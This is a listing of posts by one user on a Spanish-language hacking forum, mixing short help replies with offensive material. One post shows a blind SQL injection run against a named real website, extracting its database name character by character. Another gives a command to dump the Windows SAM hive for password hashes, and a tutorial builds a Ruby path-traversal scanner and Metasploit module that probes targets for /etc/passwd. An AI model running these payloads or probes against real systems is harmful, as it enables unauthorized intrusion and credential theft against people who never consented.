Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - q3rv0

#81
ARP flooding googlea, aunque para comprenderlo te sugiero que te adentres en el funcionamiento del protocolo ARP.
#82
Dudas y pedidos generales / Re:Personalizar
Abril 09, 2014, 11:01:11 PM
CitarDespues te recomiendo que veas este fabuloso post que dejo ANTRAX sobre primeros pasos con Kali Linux, quien personaliza bastante al mismo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

?? Le agrega los repos de apt nomas y encima vienen por defecto
#83
hola soy carlitox y vengo a flotar
#84
Diseño UX/UI / Re:Pide tu firma Underc0de V2.
Marzo 16, 2014, 06:34:21 PM
Una firma pa el pibe?
#85
Citarotra cosa el "0x3d" no significa nada más bien es un código que nos sirve para sacar la información

0x3d : signo igual (=)  en hex  separa el valor de cada columna, podrias usar cualquier caracter equivalente en hex como 0x3a : ( : ), etc
#86
Hay que resaltar que no siempre se va a tener una sesion de meterpreter para tipear HASHDUMP y obtener los hashes NTLM, por esa misma razon tambien se pueden usar herramientas como pwdump, fgdump u obetenerlas desde el mismo editor de registros

Código: dos
reg save HKLM\SAM hashes.txt
#87
Me parece una boludes, hay que ser muy pelotudo para no darte cuenta del espacio en blanco, aparte quien va a ser tan idiota de poner su contraseña real seguida de un espacio en blanco...¬¬
#88
Off Topic / Re:Echar un cable a Snowden
Enero 20, 2014, 10:07:05 PM
Vos crees que con ese enlace vas a evitar que valla a la carcel..??

SPAM DETECTED
#89
Descargar : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Extraes los archivos

Código: bash
tar xvzf ExploitPack.tar.gz


Instalas

Código: bash
dpkg -i ExploitPack.deb

#90
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Para que me va a servir esta herramienta si solo voy a ver cifras códigos y no ce q cosas mas, quiero ver texto de conversación que se ha hablao y etc..

No vas a poder capturar conversaciones de whatsapp en texto claro ni desifrarlas, el protocolo va encriptado.
#91
Estuve realizando testeos y el waf esta muy bien configurado por lo que se me hizo imposible evadir las restricciones, salvo que la unica informacion que pude obtener fue el nombre de la db con la siguiente consulta, utilizando la tecnica mysql blind, ya que no requeria de ciertas sentencias que se encuentran en la blacklist del firewall.

Código: mysql
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),1,1))=112# ->p
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),2,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),3,1))=101# -> e
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),4,1))=98# -> b
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),5,1))=100# -> d
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),6,1))=111# -> o
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),7,1))=109# -> m
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),8,1))=105# -> i
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),9,1))=95# -> _
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),10,1))=112# -> p
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),11,1))=105# -> i

http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),12,1))=101# -> e
http://www.pieb.com.bo/sipieb_nota.php?idn=8661 AND ORD(MID((DATABASE()),13,1))=98#
->b

Database: piebdomi_pieb

asi mismo se podria obtener informacion de funciones como:user(), @@datadir, etc



#92
Seguridad web y en servidores / Re:Previniendo ataques XSS
Diciembre 26, 2013, 05:40:27 PM


Tanto quilombo para filtrar un XSS en php??

Código: php
htmlentities(param, ENT_QUOTES);
#93
Proba con el modulo urllib2
#94
Si podes ser mas especifico poniendo la consulta que queres realizar y detallando un poco mas de informacion no va a ver problema en que te ayudemos

si quisieras seleccionar las columnas de una tabla que empiecen por determinada letra seria asi:

Código: mysql
SELECT columna FROM tabla WHERE columna LIKE 'f%';


Selecciona todas las palabras que empiezen por f, % es un comodin, indica cualquier caracter desp de f
#95
Hacking / Re:Recursos y aplicaciones de PENTEST
Diciembre 19, 2013, 05:46:02 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Kali Linux tiene hueco en este tema??

Es la nueva generación de BackTrack5 por así decirlo.

Saludos,
Kolibrí26

No, estas son distribuciones vulnerables para practicar en entornos controlados y son usadas como sistemas victima.
#96
Bugs y Exploits / Escribiendo un auxiliar para MSF
Diciembre 10, 2013, 04:10:05 PM


La idea de comenzar a aprender ruby llego solo por el echo de poder ver en la consola del msf un auxiliar escrito por mi, la API de metasploit no es un muy complicadad de llevar y con solo unos dias de practica, y es mas, ya estando familiarizados con otros lenguajes similares como lo son python y perl la forma de tomar el control de ruby se hace mas llevadera que comenzar desde cero, por suspuesto no estoy diciendo que sean realmente identicos pero ambos lenguajes poseen ciertas caracteristicas como la sencilles de su sintaxis, entre otras.

Durante este tutorial se mostrara paso a paso como aderir nuestra herramienta escrita en ruby como modulo auxiliar de msf. Para ello programe un sencillo scanner de LFI.


Código: ruby
#Autor: [Q]3rV[0]

require 'net/http'
require 'uri'

def conn(vector)

  host=URI.parse(vector)

  return Net::HTTP.get(host)

end

def compr(data, vector)

        if data =~ /root:/
            puts "Parametro vulnerable a LFI -> #{vector}\n"
        else
            puts "Not Found -> #{vector}\n"

    end
end

def lfi(web, pb, file)

    a=0

    while a<pb
        a=a+1

        traversal="../"*a+file
        vector=web+traversal

        data=conn(vector)

        compr(data, vector)

end
end

lfi(ARGV[0], ARGV[1].to_i, "etc/passwd")
lfi(ARGV[0], ARGV[1].to_i, "etc/passwd%00")


Se le debera pasar como argumentos el parametro vulnerable y un numero que indicara la cantidad de '../'  que realizara la inyeccion.



Lo primero que haremos sera importar el modulo msf/core y crer una clase en la cual heredaremos los metodos de Msf::Auxiliary.
Código: ruby

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

end


Luego crearemos el metodo initialize que contendra dos funciones: super() y register_options().

Código: ruby
require 'msf/core'

class Metasploit4 < Msf::Auxiliary

    def initialize

        super()

        register_options()
end

end


super() contendra la informacion de nuestro auxiliar, tales como la version, el nombre del autor, la descripcion del modulo, etc.

Código: ruby
require 'msf/core'

class Metasploit4 < Msf::Auxiliary

    def initialize

        super(
        'Name' => 'LFI scanner',
        'Version' => '1.0',
        'Description' => 'Scanner para realizar inyecciones LFI',
        'Author' => '[Q]3rV[0]',
        'License'=> MSF_LICENSE
         )

        register_options()

end
end

Por otro lado register_options() contendra las opciones del auxiliar, y es donde definiremos los argumentos para luego setearlos desde msf.

La funcion tomara dos argumentos

Código: ruby
register_options([],self.class)


Dentro del array definiremos las opciones teniendo tipos como:

Código: ruby
OptInt.new() # Para valores enteros
OptString.new() # Para cadenas
OptAddress.new() # Para direcciones


En nuestro caso quedaria de la siguiente manera

Código: ruby
require 'msf/core'

class Metasploit4 < Msf::Auxiliary

    def initialize

        super(
        'Name' => 'LFI scanner',
        'Version' => '1.0',
        'Description' => 'Scanner para realizar inyecciones LFI',
        'Author' => '[Q]3rV[0]',
        'License'=> MSF_LICENSE
         )

        register_options([OptString.new('RHOST',[true, 'Indique el target']),
          OptInt.new('TRAVERSAL',[true, 'Path traversal'])], self.class)

end
end


Fijense la sintaxis de Optxxx
Código: ruby

OptString.new('RHOST',[true, 'Indique el target'])


Recibe dos argumentos, el primero indica el nombre del parametro, el segundo es un array que contiene como primer indice un valor boleano que indica si es prescindible definir esa variable, y el segundo indice contiene la descripcion de la opcion.

Bien, ahora pasemos a la parte donde hubicaremos el codigo del scanner.

Definiremos otro metodo llamado run() donde incluiremos el codigo.

Código: ruby
require 'msf/core'
require 'net/http'
require 'uri'

class Metasploit4 < Msf::Auxiliary

    def initialize

        super(
        'Name' => 'LFI scanner',
        'Version' => '1.0',
        'Description' => 'Scanner para realizar inyecciones LFI',
        'Author' => '[Q]3rV[0]',
        'License'=> MSF_LICENSE
         )

        register_options([OptString.new('RHOST',[true, 'Indique el target']), 
          OptInt.new('TRAVERSAL',[true, 'Path traversal'])], self.class)

end

    def run()

        def conn(vector)

host=URI.parse(vector)

return Net::HTTP.get(host)

end

def compr(data, vector)

if data =~ /root:/
puts "Parametro vulnerable a LFI -> #{vector}\n"
else
puts "Not Found -> #{vector}\n"

end
end

def lfi(web, pb, file)

a=0

while a<pb
a=a+1

traversal="../"*a+file
vector=web+traversal

data=conn(vector)

compr(data, vector)

end
end

lfi(ARGV[0], ARGV[1].to_i, "etc/passwd")
lfi(ARGV[0], ARGV[1].to_i, "etc/passwd%00")   

end

end


Pero todavia falta el pasaje de los argumentos y eso lo haremos con datastore['PARAMETRO'], donde PARAMETRO seran los antes definidos con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta()

Quedando finalizado nuestro modulo auxiliar para Msf.

Código: ruby
require 'msf/core'
require 'net/http'
require 'uri'

class Metasploit4 < Msf::Auxiliary

    def initialize

        super(
        'Name' => 'LFI scanner',
        'Version' => '1.0',
        'Description' => 'Scanner para realizar inyecciones LFI',
        'Author' => '[Q]3rV[0]',
        'License'=> MSF_LICENSE
         )

        register_options([OptString.new('RHOST',[true, 'Indique el target']),
   OptInt.new('TRAVERSAL',[true, 'Path traversal'])], self.class)

end

    def run()

        def conn(vector)

host=URI.parse(vector)

return Net::HTTP.get(host)

end

def compr(data, vector)

if data =~ /root:/
puts "Parametro vulnerable a LFI -> #{vector}\n"
else
puts "Not Found -> #{vector}\n"

end
end

def lfi(web, pb, file)

a=0

while a<pb
a=a+1

traversal="../"*a+file
vector=web+traversal

data=conn(vector)

compr(data, vector)

end
end

lfi(datastore['RHOST'], datastore['TRAVERSAL'], "etc/passwd")
lfi(datastore['RHOST'], datastore['TRAVERSAL'], "etc/passwd%00")   

end

end


Para terminar agregaremos el auxiliar a msf, crearemos un direcotorio en /opt/metasploit/apps/pro/msf3/modules/auxiliary y copiaremos nuestro script dentro.

Luego accederemos a el.



#97
Dudas y pedidos generales / Re:Conexion Socks4/5 [AYUDA]
Diciembre 05, 2013, 10:26:43 PM
Proba con proxychains
#98
Off Topic / Re:¿De donde proviene tu nick?
Diciembre 02, 2013, 01:03:31 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Cuervo, con esa aclaracion, le cambiaste la vida a todo el mundo! jajaja yo estuve meses para darme cuenta lo que significaba!

ANTRAX: Lo elegí en el 2001 cuando empece en el hacking. Que fue cunado Bin laden enviaba sobres con ANTRAX (que es un virus) por sobres. Y como cuando empece en el 2001, me gustaban los malwares, tomé ese nombre como nick

jajaja me acuerdo cuando empezaron con esa locura de los sobres en la argentina!
#99
Off Topic / Re:¿De donde proviene tu nick?
Diciembre 02, 2013, 12:31:58 PM
q3rv0==Cuervo
#100
Dudas y pedidos generales / Re:Aprendiendo con Curl
Noviembre 22, 2013, 05:07:55 PM
Lo mas probable es que el hosting donde tenes montado el script haya sido reportado como phishing.